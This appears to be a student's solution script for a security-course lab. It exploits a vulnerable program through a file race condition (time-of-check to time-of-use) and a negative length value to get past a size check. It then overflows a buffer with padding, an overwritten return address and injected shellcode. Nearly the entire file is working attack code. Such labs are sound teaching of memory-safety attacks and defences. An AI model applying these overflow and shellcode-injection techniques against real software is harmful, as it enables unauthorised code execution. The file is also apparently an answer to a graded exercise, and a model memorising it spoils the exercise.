#!/usr/bin/env python3

import scaffold as p
from scaffold import SHELLCODE
import sys

# Configure Python to print text strings like byte strings. Don't remove this!
sys.stdout.reconfigure(encoding='latin1')

### YOUR CODE STARTS HERE ###

# The encoding='latin1' argument here is pretty important, so don't remove it!
with open('hack', 'w', encoding='latin1') as f:
    f.write('Hello world!\n')

p.start()

assert p.recv(30) == 'How many bytes should I read? '

# p.send('120\n')
# p.send('4294967296\n')

# TOCTTOU here
# set rip as 0xffffd740
with open('hack', 'w', encoding='latin1') as f:
    f.write('A' * 127 + '\n' + 'a' * 20 + '\x40\xd7\xff\xff' + SHELLCODE)

p.send('-1\n')

# assert p.recv(18) == 'Here is the file!\n'
print(p.recv(82))

### YOUR CODE ENDS HERE ###
